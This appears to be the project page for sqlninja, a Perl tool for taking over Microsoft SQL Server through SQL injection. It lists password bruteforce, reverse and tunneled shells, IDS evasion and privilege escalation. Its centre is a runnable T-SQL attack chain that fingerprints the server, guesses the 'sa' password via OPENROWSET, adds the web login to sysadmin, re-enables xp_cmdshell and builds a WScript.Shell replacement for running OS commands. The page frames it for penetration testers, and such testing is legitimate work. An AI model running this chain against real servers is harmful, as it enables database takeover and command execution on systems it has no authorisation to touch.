Introduction
Fancy going from a SQL injection on Microsoft SQL Server to full GUI access on the DB? Take a few new SQL injection tricks, add a couple of remote writes to the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well, and you have just one of the attack modules of sqlninja!
Sqlninja is a tool targeted at exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their back-end.
Its main goal is to provide remote access to the vulnerable DB server, even in a very hostile environment. It is meant for penetration testers, to help automate the process of taking over a DB server once a SQL injection vulnerability has been discovered.
Have a look at the flash demo and then feel free to download. It is released under the GPLv3.
Features
The full documentation can be found in the tarball and also online, but here's a list of what the Ninja does:
- Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
- Bruteforce of the 'sa' password (in two flavors: dictionary-based and incremental)
- Privilege escalation to sysadmin group if 'sa' password has been found
- Creation of a custom xp_cmdshell if the original one has been removed
- Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
- TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
- Direct and reverse bindshell, both TCP and UDP
- ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
- DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
- Evasion techniques to confuse a few IDS/IPS/WAF
- Integration with Metasploit3, to obtain graphical access to the remote DB server through a VNC server injection
- Integration with churrasco.exe, to escalate privileges to SYSTEM on Windows Server 2003 via token kidnapping
- Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM
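The following T-SQL is an added illustration of what the first four items above reduce to once a stacked-query injection point has been found; it is not sqlninja's own code and does not show how the tool implements any of these steps. The login name `webapp`, the guessed password `Spring2010!`, the procedure name `xp_cmdshell_custom` and the use of the `SQLOLEDB` provider with a local data source are assumptions for the example. The batches are separated with `GO` as you would run them from sqlcmd or SSMS to check the queries; through an injection point each step is sent as its own stacked query, with the `CREATE PROCEDURE` wrapped in `EXEC('...')` because it must be alone in its batch.

```sql
-- Added example, not sqlninja code. Runs as the web application's login
-- ('webapp' is a placeholder) through a stacked-query injection point.

-- 1. Fingerprint: version, executing login, privileges, authentication mode.
SELECT @@version                                  AS version_banner;
SELECT SYSTEM_USER                                AS executing_login,
       USER_NAME()                                AS db_user,
       IS_SRVROLEMEMBER('sysadmin')               AS is_sysadmin,        -- 1 = already sysadmin
       SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;  -- 0 = mixed mode: 'sa' has a password to guess

-- xp_cmdshell availability: does the extended procedure still exist, and is it enabled?
-- (sys.configurations exists on SQL Server 2005 and later; on 2000 it is always enabled if present)
SELECT OBJECT_ID('master..xp_cmdshell')           AS xp_cmdshell_object_id;  -- NULL = dropped
SELECT name, value_in_use
  FROM sys.configurations
 WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');
GO

-- 2. One 'sa' password guess. OPENROWSET opens a second connection to the
--    same server with the supplied credentials; a wrong password makes the
--    query fail with a login error, a right one returns a row. Mixed-mode
--    authentication and (on 2005+) 'Ad Hoc Distributed Queries' are required.
--    The password value is a placeholder; a bruteforcer repeats this per guess.
SELECT 1 AS sa_login_ok
  FROM OPENROWSET('SQLOLEDB', '';'sa';'Spring2010!', 'SELECT 1');
GO

-- 3. Privilege escalation with the recovered password: the inner batch runs
--    as 'sa', so it can add the low-privileged web login to the sysadmin role.
SELECT *
  FROM OPENROWSET('SQLOLEDB', '';'sa';'Spring2010!',
       'SELECT 1; EXEC master..sp_addsrvrolemember ''webapp'', ''sysadmin''');
GO

-- 4a. Now sysadmin: if xp_cmdshell was only disabled, turn it back on.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';
GO

-- 4b. If the extended procedure was dropped, build a replacement on
--     OLE Automation (WScript.Shell). Output is not captured here; the
--     command itself can redirect to a file or a network listener.
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
GO
CREATE PROCEDURE dbo.xp_cmdshell_custom @cmd NVARCHAR(4000) AS  -- name is a placeholder
BEGIN
    DECLARE @shell INT, @hr INT;
    EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
    IF @hr = 0
    BEGIN
        -- WScript.Shell.Run(command, windowStyle = 0 hidden, waitOnReturn = 1)
        EXEC @hr = sp_OAMethod @shell, 'Run', NULL, @cmd, 0, 1;
        EXEC sp_OADestroy @shell;
    END
    RETURN @hr;  -- 0 on success, otherwise the HRESULT from the OLE call
END;
GO
EXEC dbo.xp_cmdshell_custom 'cmd.exe /c whoami > C:\Windows\Temp\who.txt';
```

Each step is a check as much as an attack: `windows_auth_only = 1` tells you the 'sa' bruteforce cannot succeed, a NULL `xp_cmdshell_object_id` tells you step 4a will fail and 4b is needed, and a login error from step 2 is the negative signal the dictionary loop keys on. `sp_addsrvrolemember` is deprecated but still present on current versions; `ALTER SERVER ROLE sysadmin ADD MEMBER webapp` is the modern equivalent.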
Platforms supported
Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
- Linux
- FreeBSD
- Mac OS X
Sqlninja does not run on Windows, and I am not planning a port in the near future.